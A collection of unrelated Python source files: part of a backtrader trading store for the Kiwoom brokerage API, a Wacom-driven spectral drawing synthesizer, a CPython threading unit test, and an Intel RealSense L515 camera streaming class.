(TimeFrame.Minutes, 30): ('opt10080', {'종목코드': '', '틱범위': '30', '수정주가구분': '1'}),
(TimeFrame.Minutes, 45): ('opt10080', {'종목코드': '', '틱범위': '45', '수정주가구분': '1'}),
(TimeFrame.Minutes, 60): ('opt10080', {'종목코드': '', '틱범위': '60', '수정주가구분': '1'}),
(TimeFrame.Days, 1): ('opt10081', {'종목코드': '', '기준일자': '', '수정주가구분': '1'}),
(TimeFrame.Weeks, 1): ('opt10082', {'종목코드': '', '기준일자': '', '끝일자': '', '수정주가구분': '1'}),
(TimeFrame.Months, 1): ('opt10083', {'종목코드': '', '기준일자': '', '끝일자': '', '수정주가구분': '1'}),
(TimeFrame.Years, 1): ('opt10094', {'종목코드': '', '기준일자': '', '끝일자': '', '수정주가구분': '1'}),
}
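    # Illustrative lookup: get_granularity(TimeFrame.Minutes, 5) resolves to
    # ('opt10080', {'종목코드': '', '틱범위': '5', '수정주가구분': '1'}), i.e. the TR code
    # for 5-minute candles plus its default inputs; unmapped pairs fall back to `default`.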
def get_granularity(self, timeframe, compression, default=None):
return self._GRANULARITIES.get((timeframe, compression), default)
def get_instrument(self, dataname):
try:
insts = self.context.get_instruments(self.p.account, instruments=dataname)
except KiwoomOpenApiError:
return None
i = insts.get('instruments', [{}])
return i[0] or None
def streaming_events(self, tmout=None):
q = queue.Queue()
kwargs = {'q': q, 'tmout': tmout}
t = threading.Thread(target=self._t_streaming_listener, kwargs=kwargs)
t.daemon = True
t.start()
t = threading.Thread(target=self._t_streaming_events, kwargs=kwargs)
t.daemon = True
t.start()
return q
def _t_streaming_listener(self, q, tmout=None):
while True:
trans = q.get()
self._transaction(trans)
def _t_streaming_events(self, q, tmout=None):
if tmout is not None:
time.sleep(tmout)
streamer = KiwoomOpenApiEventStreamer(self.context, q)
streamer.events()
def candles(self, dataname, dtbegin, dtend, timeframe, compression): # pylint: disable=unused-argument
kwargs = locals().copy()
kwargs.pop('self')
kwargs['q'] = q = queue.Queue()
t = threading.Thread(target=self._t_candles, kwargs=kwargs)
t.daemon = True
t.start()
return q
def _t_candles(self, dataname, dtbegin, dtend, timeframe, compression, q):
trcode, inputs = self.get_granularity(timeframe, compression, (None, None))
if trcode is None:
e = KiwoomOpenApiTimeFrameError()
q.put(e.error_response)
return
inputs = inputs.copy()
inputs['종목코드'] = dataname
if dtbegin is not None:
if '끝일자' in inputs:
inputs['끝일자'] = dtbegin.strftime('%Y%m%d')
if dtend is not None:
if '기준일자' in inputs:
inputs['기준일자'] = dtend.strftime('%Y%m%d')
try:
response = self.context.get_history(trcode, inputs, dtbegin, dtend)
except KiwoomOpenApiError as e:
q.put(KiwoomOpenApiJsonError(e).error_response)
q.put(None)
return
for candle in response.get('candles', []):
q.put(candle)
q.put({})
def streaming_prices(self, dataname, tmout=None):
q = queue.Queue()
kwargs = {'q': q, 'dataname': dataname, 'tmout': tmout}
t = threading.Thread(target=self._t_streaming_prices, kwargs=kwargs)
t.daemon = True
t.start()
return q
def _t_streaming_prices(self, dataname, q, tmout):
if tmout is not None:
time.sleep(tmout)
streamer = KiwoomOpenApiEventStreamer(self.context, q)
streamer.rates(dataname)
def get_cash(self):
return self._cash
def get_value(self):
return self._value
def get_positions(self):
try:
positions = self.context.get_positions(self.p.account)
except KiwoomOpenApiError:
return None
poslist = positions.get('positions', [])
return poslist
def broker_threads(self):
self.q_account = queue.Queue()
self.q_account.put(True) # force an immediate update
t = threading.Thread(target=self._t_account)
t.daemon = True
t.start()
self.q_ordercreate = queue.Queue()
t = threading.Thread(target=self._t_order_create)
t.daemon = True
t.start()
self.q_orderclose = queue.Queue()
t = threading.Thread(target=self._t_order_cancel)
t.daemon = True
t.start()
# Wait once for the values to be set
self._evt_acct.wait(self.p.account_tmout)
def _t_account(self):
while True:
try:
msg = self.q_account.get(timeout=self.p.account_tmout)
if msg is None:
break # end of thread
except queue.Empty: # tmout -> time to refresh
pass
try:
accinfo = self.context.get_account(self.p.account)
except Exception as e: # pylint: disable=broad-except
self.put_notification(e)
continue
try:
self._cash = accinfo['marginAvail']
self._value = accinfo['balance']
except KeyError:
pass
self._evt_acct.set()
# from below, it's related to processing orders
_ORDEREXECS = {
bt.Order.Market: 'market',
bt.Order.Limit: 'limit',
bt.Order.Stop: 'stop',
bt.Order.StopLimit: 'stop',
}
def order_create(self, order, stopside=None, takeside=None, **kwargs):
okwargs = dict()
okwargs['instrument'] = order.data._dataname
okwargs['units'] = abs(order.created.size)
okwargs['side'] = 'buy' if order.isbuy() else 'sell'
okwargs['type'] = self._ORDEREXECS[order.exectype]
if order.exectype != bt.Order.Market:
okwargs['price'] = order.created.price
if order.valid is None:
# 1 year and datetime.max fail ... 1 month works
valid = datetime.datetime.utcnow() + datetime.timedelta(days=30)
else:
valid = order.data.num2date(order.valid)
# To timestamp with seconds precision
okwargs['expiry'] = int((valid - self._DTEPOCH).total_seconds())
if order.exectype == bt.Order.StopLimit:
okwargs['lowerBound'] = order.created.pricelimit
okwargs['upperBound'] = order.created.pricelimit
if order.exectype == bt.Order.StopTrail:
okwargs['trailingStop'] = order.trailamount
if stopside is not None:
okwargs['stopLoss'] = stopside.price
if takeside is not None:
okwargs['takeProfit'] = takeside.price
okwargs.update(**kwargs) # anything from the user
self.q_ordercreate.put((order.ref, okwargs,))
return order
_OIDSINGLE = ['orderOpened', 'tradeOpened', 'tradeReduced']
_OIDMULTIPLE = ['tradesClosed']
def _t_order_create(self):
while True:
msg = self.q_ordercreate.get()
if msg is None:
break
oref, okwargs = msg
try:
o = self.context.create_order(self.p.account, **okwargs)
except Exception as e:
self.put_notification(e)
self.broker._reject(oref)
return
# Ids are delivered in different fields and all must be fetched to
# match them (as executions) to the order generated here
oids = list()
for oidfield in self._OIDSINGLE:
if oidfield in o and 'id' in o[oidfield]:
oids.append(o[oidfield]['id'])
for oidfield in self._OIDMULTIPLE:
if oidfield in o:
for suboidfield in o[oidfield]:
oids.append(suboidfield['id'])
if not oids:
self.broker._reject(oref)
return
self._orders[oref] = oids[0]
self.broker._submit(oref)
if okwargs['type'] == 'market':
self.broker._accept(oref) # taken immediately
for oid in oids:
self._ordersrev[oid] = oref # maps ids to backtrader order
                # A transaction may have happened and was stored
tpending = self._transpend[oid]
tpending.append(None) # eom marker
while True:
trans = tpending.popleft()
if trans is None:
break
self._process_transaction(oid, trans)
def order_cancel(self, order):
self.q_orderclose.put(order.ref)
return order
def _t_order_cancel(self):
while True:
oref = self.q_orderclose.get()
if oref is None:
break
oid = self._orders.get(oref, None)
if oid is None:
continue # the order is no longer there
try:
o = self.context.close_order(self.p.account, oid)
except Exception as e:
continue # not cancelled - FIXME: notify
self.broker._cancel(oref)
_X_ORDER_CREATE = ('STOP_ORDER_CREATE',
'LIMIT_ORDER_CREATE', 'MARKET_IF_TOUCHED_ORDER_CREATE',)
def _transaction(self, trans):
# Invoked from Streaming Events. May actually receive an event for an
# oid which has not yet been returned after creating an order. Hence
# store if not yet seen, else forward to processer
ttype = trans['type']
if ttype == 'MARKET_ORDER_CREATE':
try:
oid = trans['tradeReduced']['id']
except KeyError:
try:
oid = trans['tradeOpened']['id']
except KeyError:
return # cannot do anything else
elif ttype in self._X_ORDER_CREATE:
oid = trans['id']
elif ttype == 'ORDER_FILLED':
oid = trans['orderId']
elif ttype == 'ORDER_CANCEL':
oid = trans['orderId']
elif ttype == 'TRADE_CLOSE':
oid = trans['id']
pid = trans['tradeId']
if pid in self._orders and False: # Know nothing about trade
return # can do nothing
# Skip above - at the moment do nothing
# Received directly from an event in the WebGUI for example which
# closes an existing position related to order with id -> pid
# COULD BE DONE: Generate a fake counter order to gracefully
# close the existing position
msg = ('Received TRADE_CLOSE for unknown order, possibly generated'
' over a different client or GUI')
self.put_notification(msg, trans)
return
        else:  # Go away gracefully
try:
oid = trans['id']
except KeyError:
oid = 'None'
msg = 'Received {} with oid {}. Unknown situation'
msg = msg.format(ttype, oid)
self.put_notification(msg, trans)
return
try:
oref = self._ordersrev[oid]
self._process_transaction(oid, trans)
except KeyError: # not yet seen, keep as pending
self._transpend[oid].append(trans)
_X_ORDER_FILLED = ('MARKET_ORDER_CREATE',
'ORDER_FILLED', 'TAKE_PROFIT_FILLED',
'STOP_LOSS_FILLED', 'TRAILING_STOP_FILLED',)
def _process_transaction(self, oid, trans):
try:
oref = self._ordersrev.pop(oid)
except KeyError:
return
ttype = trans['type']
if ttype in self._X_ORDER_FILLED:
size = trans['units']
if trans['side'] == 'sell':
size = -size
price = trans['price']
self.broker._fill(oref, size, price, ttype=ttype)
elif ttype in self._X_ORDER_CREATE:
self.broker._accept(oref)
self._ordersrev[oid] = oref
        elif ttype == 'ORDER_CANCEL':
reason = trans['reason']
if reason == 'ORDER_FILLED':
pass # individual execs have done the job
elif reason == 'TIME_IN_FORCE_EXPIRED':
self.broker._expire(oref)
elif reason == 'CLIENT_REQUEST':
self.broker._cancel(oref)
else: # default action ... if nothing else
self.broker._reject(oref)
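# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): how a backtrader store
# like this one is typically wired into a Cerebro instance through the
# getdata()/getbroker() classmethods defined above. The data feed keyword
# arguments (e.g. `dataname`, `timeframe`, `compression`) are illustrative
# assumptions only.
#
#   import backtrader as bt
#   from koapy.backtrader.KiwoomOpenApiStore import KiwoomOpenApiStore
#
#   cerebro = bt.Cerebro()
#   store = KiwoomOpenApiStore()
#   cerebro.setbroker(store.getbroker())
#   cerebro.adddata(store.getdata(dataname='005930',
#                                 timeframe=bt.TimeFrame.Minutes, compression=1))
#   cerebro.run()
# ---------------------------------------------------------------------------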
|
dessin.py
|
import pygame
from bisect import bisect_left
from PIL import Image
from bresenham import bresenham
import numpy as np
import delegator
import math
from threading import Thread
from subprocess import Popen, PIPE
from pyo import *
from time import time
from collections import namedtuple
class WacomValues:
    def __init__(self):
        """Continuously read stylus tilt and pressure from `libinput debug-events` in a background thread."""
        self.tilt_x = 0
        self.tilt_y = 0
        self.pressure = 0
        # Daemon thread so the application can still exit even though this loop never returns
        self.thread = Thread(target=self.update_wacom_stuff, daemon=True)
        self.thread.start()
def update_wacom_stuff(self):
libin = Popen(["unbuffer", "libinput", "debug-events"], stdout=PIPE)
while True:
l = libin.stdout.readline().decode("utf-8")
# tilt 3
# pressure 4
try:
if "TABLET_TOOL" in l:
self.tilt_x, self.tilt_y = [min(max((float(num.strip())+60)/120, -1.0), 1.0) for num in l.split("\t")[3].split("tilt:")[1].replace("*","").split("/")]
if "pressure" in l:
self.pressure = float(l.split("\t")[4].split("pressure:")[1].split(" ")[1].replace("*",""))
except:
pass
class Brush:
def preview(self, points):
pyo_sine_pan.setPan(points[0].pan)
for point in points:
faderidx = int((1-point.y)*current_surface.get_height()*preview_quality_factor)
if faderidx < len(pyo_sine_faders):
fader = pyo_sine_faders[faderidx]
fader.mul = fader_loudness*(float(point.amp))
fader.play()
class PixelBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
points = [Point(y, 1, x)]
current_spec_unit.modify_or_insert_line(points, x)
class HarmonicBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
points = [Point(y, 1, x)]
ratio = 2
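        # A partial at frequency ratio `r` lies log2(r) octaves above the fundamental; since the
        # canvas spans `bandwidth` octaves (y shrinking as frequency rises), that partial sits
        # log2(r)/bandwidth higher (i.e. at a smaller y) on the normalized axis, as computed below.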
bandwidth = math.log(max_freq/min_freq,2)
next_y = (bandwidth*y - math.log(ratio,2)) / bandwidth
while next_y > 0 and ratio < 12:
points.append(Point(next_y, 1/(ratio/1.5), x))
ratio+=1
next_y = (bandwidth*y - math.log(ratio,2)) / bandwidth
current_spec_unit.modify_or_insert_line(points, x)
class WSampleLoopBrush(Brush):
def __init__(self):
loadt = Thread(target=lambda:self.load())
loadt.start()
def load(self):
self.loaded = False
bpo = (current_surface.get_height()-1)/math.log(max_freq/min_freq,2)
self.sndTable = SndTable('sample.wav')
delegator.run("arss sample.wav sample.bmp --min-freq {} --max-freq {} --pps 150 --bpo {}".format(min_freq, max_freq, bpo))
self.sample = np.asarray(Image.open("sample.bmp"))
self.idx = 0
print("loaded")
self.loaded = True
def preview(self, offset):
if pyo_sample_reader.table != self.sndTable:
pyo_sample_reader.setTable(self.sndTable)
pyo_sample_reader.setFreq(self.sndTable.getRate())
# number of octaves
bandwidth = math.log(max_freq/min_freq,2)
# number of semitones in the bandwidth
note_num = bandwidth*12
transpo = offset * note_num
pyo_sample_transpo.setTranspo(transpo)
pyo_sample_fader.mul = wacom.pressure
pyo_sample_reader.setPhase(self.idx/len(self.sample[0]))
pyo_sample_pan.setPan(wacom.tilt_x)
pyo_sample_fader.play()
def draw(self, x, y):
if not self.loaded:
return
x = x/current_surface.get_width()
offset = y/current_surface.get_height() - 0.5
increment = 1/current_surface.get_height()
points = []
for i in range(len(self.sample)):
pointy = i * increment + offset
if wacom.pressure * (self.sample[i][self.idx][0]) <=3:
continue
if pointy >= 1 or pointy < 0:
continue
points.append(Point(pointy, wacom.pressure * (self.sample[i][self.idx][0])/255, wacom.tilt_x))
# advance one point in the self.sample and loop
self.preview((1 - y/current_surface.get_height())-0.5)
current_spec_unit.modify_or_insert_line(points, x)
self.idx+=1
self.idx%=len(self.sample[0])
class WHarmonicBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
points = [Point(y, wacom.pressure, wacom.tilt_x)]
ratio = 2
# frequency bandwidth in number of octaves
bandwidth = math.log(max_freq/min_freq,2)
next_y = (bandwidth*y - math.log(ratio,2)) / bandwidth
while next_y > 0 and ratio < 12:
multip = 1
if ratio %2 == 0:
multip = wacom.tilt_y * 2
else:
multip = (1 - wacom.tilt_y) * 2
amp = wacom.pressure/max(((ratio/1.5) * multip),1)
points.append(Point(next_y, amp, wacom.tilt_x))
ratio+=1
next_y = (bandwidth*y - math.log(ratio,2)) / bandwidth
self.preview(points)
current_spec_unit.modify_or_insert_line(points, x)
class WSineBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
points = [Point(y, wacom.pressure, wacom.tilt_x)]
self.preview(points)
current_spec_unit.modify_or_insert_line(points, x)
class WNoiseBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
increment = 1/current_surface.get_height()
points = []
h = int(wacom.tilt_y*(current_surface.get_height()/3))
highest = 1 - max(y - (h*increment),0)
lowest = 1 - min(y + (h*increment),1)
for i in range(-h,h+1):
points.append(Point(min(max(y+i*increment, 0), 1 - increment), wacom.pressure, wacom.tilt_x))
self.preview(highest, lowest, wacom.pressure, wacom.tilt_x)
current_spec_unit.modify_or_insert_line(points, x)
def preview(self, highest, lowest, amp, pan):
# number of octaves
bandwidth = math.log(max_freq/min_freq,2)
# number of midi note in the bandwidth
note_num = bandwidth*12
        # the target midi note is the normalized location in y + the base midi note offset
pyo_noise_hp.setFreq(midi_to_freq((note_num * lowest) + freq_to_midi(min_freq)))
pyo_noise_lp.setFreq(midi_to_freq((note_num * highest) + freq_to_midi(min_freq)))
pyo_noise_pan.setPan(pan)
pyo_noise_fader.mul = amp
pyo_noise_fader.play()
class NoiseBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
increment = 1/current_surface.get_height()
points = []
for i in range(-10,11):
points.append(Point(y+i*increment, 1, x))
current_spec_unit.modify_or_insert_line(points, x)
class Point:
def __init__(self, y, amp, pan):
self.y = y
self.amp = amp
self.pan = pan
self.dirty = True
self.gesture_id = current_gesture
def render(self, x_value):
if not self.dirty:
return
self.dirty = False
y_value = round(self.y * current_surface.get_height())
l_amp, r_amp = [self.amp * math.sin(self.pan*math.pi/2), self.amp * math.cos(self.pan*math.pi/2)]
pixel_color = [l_amp*255,0 , r_amp*255]
canvas_l[y_value][x_value] += pixel_color[2]
canvas_l[y_value][x_value] = min(canvas_l[y_value][x_value], 255)
canvas_r[y_value][x_value] += pixel_color[0]
canvas_r[y_value][x_value] = min(canvas_r[y_value][x_value], 255)
try:
current_surface.fill([canvas_r[y_value][x_value],0,canvas_l[y_value][x_value]], ((x_value,y_value),(1,1)))
except:
pass
class Line:
    def __init__(self, x, width):
        self.x = x
        self.width = width
self.points = []
self.points_y = []
self.dirty = True
self.gesture_id = current_gesture
def render(self):
if not self.dirty:
return
self.dirty = False
x_value = round(self.x * current_surface.get_width())
for point in self.points:
point.render(x_value)
def add_point(self, point):
self.dirty = True
idx = bisect_left(self.points_y, point.y)
adjacent_point = self.points[idx] if idx < len(self.points) else None
if adjacent_point and adjacent_point.y == point.y:
adjacent_point.pan = point.pan
adjacent_point.amp = point.amp
adjacent_point.dirty = True
else:
self.points.insert(idx, point)
self.points_y.insert(idx, point.y)
def add_points(self, points):
for point in points:
self.add_point(point)
class SpectrumUnit:
def __init__(self):
self.lines = []
        # keeping this allows us to avoid rebuilding this list every time we need to bisect
self.lines_x = []
def modify_or_insert_line(self, points, x):
line = None
# right now, can only add one line at a time
idx = bisect_left(self.lines_x, x)
adjacent_line = self.lines[idx] if idx < len(self.lines) else None
if adjacent_line and adjacent_line.x == x:
line = adjacent_line
else:
line = Line(x, 1/current_surface.get_width())
self.lines.insert(idx, line)
self.lines_x.insert(idx, x)
line.add_points(points)
def invalidate_canvas(self):
global canvas_l
global canvas_r
canvas_l = [[0 for i in range(w)] for i in range(h)]
canvas_r = [[0 for i in range(w)] for i in range(h)]
current_surface.fill([0,0,0])
for line in self.lines:
line.dirty = True
for point in line.points:
point.dirty = True
def remove_last_gesture(self):
gesture_to_remove = gesture_stack.pop()
for line in self.lines:
line.points = [point for point in line.points if point.gesture_id != gesture_to_remove]
self.invalidate_canvas()
h = 1000
w = 1800
max_freq = 20000
min_freq = 27.5
canvas_l = [[0 for i in range(w)] for i in range(h)]
canvas_r = [[0 for i in range(w)] for i in range(h)]
gesture_stack = []
current_spec_unit = SpectrumUnit()
current_surface = None
current_brush = None
wacom = WacomValues()
current_gesture = 0
pyo_server = Server(audio="jack").boot()
pyo_server.start()
def midi_to_freq(note_num):
return (440 / 32) * (2 ** ((note_num - 9) / 12))
def freq_to_midi(freq):
return math.log(freq/440.0,2) * 12 + 69
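# Sanity check (illustrative): midi_to_freq(69) == 440.0 and freq_to_midi(440.0) == 69.0,
# i.e. MIDI note 69 maps to concert A and the two functions are inverses of each other.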
preview_quality_factor = 0.3
bpo = ((preview_quality_factor*h)-1)/math.log(max_freq/min_freq,2)
midi_notes_increment = 12/bpo
fader_loudness = 0.1
pyo_sine_faders = [Fader(fadeout=0.03, dur=0.04, mul=fader_loudness) for i in range(int(h*preview_quality_factor))]
pyo_sines = FastSine(mul=pyo_sine_faders,freq=[midi_to_freq(freq_to_midi(min_freq)+i*midi_notes_increment) for i in range(int(h*preview_quality_factor))])
pyo_sine_pan = Pan(pyo_sines).out()
pyo_noise_fader = Fader(fadeout=0.03, dur=0.04, mul=1)
pyo_noise = Noise(mul=pyo_noise_fader)
pyo_noise_hp = Biquadx(pyo_noise, q=1, type=1)
pyo_noise_lp = Biquadx(pyo_noise_hp, q=1)
pyo_noise_pan = Pan(pyo_noise_lp).out()
pyo_sample_fader = Fader(fadeout=0.03, dur=0.04, mul=1)
pyo_sample_reader = Osc(HarmTable([1]), mul=pyo_sample_fader)
pyo_sample_transpo = Harmonizer(pyo_sample_reader, transpo=0, winsize=0.03)
pyo_sample_pan = Pan(pyo_sample_transpo).out()
last_grid_len = 33
grid_len = 33
def main():
global last_grid_len
global grid_len
pressing = False
pygame.init()
pygame.display.set_caption("dessin")
global current_gesture
screen = pygame.display.set_mode((w,h))
global current_surface
current_surface = screen
brushes = [WSineBrush(), WHarmonicBrush(), WNoiseBrush(), WSampleLoopBrush()]
current_brush = brushes[0]
last_mouse_pos = None
running = True
framenum=0
ctrl= False
playing_start = False
playing = False
last_x = 0
grid_changed = True
while running:
for line in current_spec_unit.lines:
line.render()
if grid_changed:
for i in range(int(current_surface.get_width()/last_grid_len)):
current_surface.fill([0,40,0,0.1], ((i * last_grid_len,0),(1,current_surface.get_height())), pygame.BLEND_RGBA_SUB)
for i in range(int(current_surface.get_width()/grid_len)):
current_surface.fill([0,40,0,0.1], ((i * grid_len,0),(1,current_surface.get_height())), pygame.BLEND_RGBA_ADD)
last_grid_len = grid_len
grid_changed = False
if playing:
num_seconds = current_surface.get_width()/150
x = int(((playing-playing_start)/num_seconds) * current_surface.get_width())
if x >= current_surface.get_width():
playing = False
playing_start = False
last_x=0
current_surface.fill([0,100,0,0.3], ((x - (x-last_x),0),(x-last_x,current_surface.get_height())), pygame.BLEND_RGBA_SUB)
continue
if x-last_x >=1:
current_surface.fill([0,100,0,0.3], ((x - (x-last_x),0),(x-last_x,current_surface.get_height())), pygame.BLEND_RGBA_ADD)
playing = time()
last_x = x
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.MOUSEBUTTONUP:
pressing = False
gesture_stack.append(current_gesture)
current_gesture += 1
last_mouse_pos = None
grid_changed = True
if event.type == pygame.MOUSEBUTTONDOWN:
pressing = True
last_mouse_pos = [-1,-1]
if event.type == pygame.MOUSEMOTION and pressing:
if last_mouse_pos != [-1,-1]:
points = bresenham(last_mouse_pos[0], last_mouse_pos[1], event.pos[0], event.pos[1])
else:
points = [[event.pos[0], event.pos[1]]]
for p in list(points)[0:-1]:
current_brush.draw(p[0], p[1])
last_mouse_pos = event.pos
if event.type == pygame.KEYDOWN:
num = -1
try:
num = int(event.unicode)
except:
pass
if num > -1:
current_brush = brushes[num-1]
elif event.key == 122 and pygame.key.get_mods() & pygame.KMOD_CTRL:
current_spec_unit.remove_last_gesture()
elif event.unicode == "+":
last_grid_len = grid_len
grid_len += 1
grid_changed = True
elif event.unicode == "-":
last_grid_len = grid_len
grid_len -= 1
grid_changed = True
elif event.unicode == " ":
if playing:
continue
il = Image.fromarray(np.asarray(canvas_l, np.dtype('uint8')))
il.convert("RGB").save("out_l.bmp")
ir = Image.fromarray(np.asarray(canvas_r, np.dtype('uint8')))
ir.convert("RGB").save("out_r.bmp")
delegator.run("arss out_l.bmp o_l.wav --sine --min-freq 27.5 --max-freq 20000 -r 44000 -f 16 --pps 150")
delegator.run("arss out_r.bmp o_r.wav --sine --min-freq 27.5 --max-freq 20000 -r 44000 -f 16 --pps 150")
delegator.run("sox o_l.wav o_r.wav --channels 2 --combine merge o.wav")
delegator.run("play o.wav", block=False)
playing_start = time()
playing = time()
pygame.display.update()
if __name__=="__main__":
main()
|
test_threading.py
|
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import sys
import threading
import thread
import time
import unittest
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() * 2
if verbose:
print 'task', self.getName(), 'will run for', delay, 'sec'
self.sema.acquire()
self.mutex.acquire()
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assert_(self.nrunning.get() <= 3)
self.mutex.release()
time.sleep(delay)
if verbose:
print 'task', self.getName(), 'done'
self.mutex.acquire()
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print self.getName(), 'is finished.', self.nrunning.get(), \
'tasks are running'
self.mutex.release()
self.sema.release()
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.isAlive())
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Acquiring an RLock forces an entry for the foreign
# thread to get made in the threading._active map.
r = threading.RLock()
r.acquire()
r.release()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
@test.test_support.impl_detail(msg="relies on ctypes access to CPython C API")
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.setDaemon(True) # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
worker_started.wait()
if verbose:
print " verifying worker hasn't exited"
self.assert_(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
for i in xrange(1, 1000):
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_main():
test.test_support.run_unittest(ThreadTests)
if __name__ == "__main__":
test_main()
|
l500.py
|
## License: Apache 2.0. See LICENSE file in root directory.
## Copyright(c) 2015-2017 Intel Corporation. All Rights Reserved.
###############################################
## Open CV and Numpy integration ##
###############################################
import pyrealsense2 as rs
import numpy as np
import cv2
import sys
import threading
import time
class L515():
def __init__(self):
        # Initialization
self.pipeline = rs.pipeline()
self.config = rs.config()
        # Enable the camera and start the streams
self.config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
# self.config.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)
self.config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
self.profile = self.pipeline.start(self.config)
#
self.stream = threading.Thread(target=self.update_frame)
self.flag = 1
        # rs.align aligns the depth frames with the other frames
align_to = rs.stream.color
self.align = rs.align(align_to)
        # Variables holding the latest frames
self.depth_frame, self.color_frame = [], []
self.depth_numpy, self.color_numpy = [], []
self.depth_image, self.color_image = [], []
def update_frame(self):
### 01 ###
while self.flag:
### 02 ###
frames = self.pipeline.wait_for_frames()
aligned_frames = self.align.process(frames)
self.depth_frame = aligned_frames.get_depth_frame()
self.color_frame = aligned_frames.get_color_frame()
            if not self.depth_frame or not self.color_frame: continue  # skip incomplete frames instead of ending the thread
### 03 ###
# convert to cv2 from pipeline
self.color_numpy = np.asanyarray(self.color_frame.get_data())
self.depth_numpy = np.asanyarray(self.depth_frame.get_data())
            # Keep a single, uniform interface (slightly wasteful, but consistent to use)
self.color_image = self.color_numpy
self.depth_image = cv2.applyColorMap(cv2.convertScaleAbs(self.depth_numpy, alpha=0.03), cv2.COLORMAP_JET)
def get_depth(self, x, y):
return self.depth_frame.get_distance(x,y)
def clipping_bg(self, clip_distance=1, bg_color=153):
        # Convert metres into RealSense depth units
depth_sensor = self.profile.get_device().first_depth_sensor()
depth_scale = depth_sensor.get_depth_scale()
        # Clipping distance and background color
clipping_distance = (clip_distance / depth_scale)
bg_color = bg_color
        # Extract the foreground
depth_image_3d = np.dstack((self.depth_numpy, self.depth_numpy, self.depth_numpy))
bg_removed = np.where((depth_image_3d > clipping_distance) | (depth_image_3d <= 0), bg_color, self.color_numpy)
return bg_removed
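    # Example (illustrative): keep everything closer than 1.5 m and paint the rest grey:
    #   foreground = l515.clipping_bg(clip_distance=1.5, bg_color=153)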
def start_stream(self):
print(f"Start Stream ... " , end='\n')
self.stream.start()
time.sleep(1)
    def stop_stream(self):
        print("Stop Stream ...")
        self.flag = 0
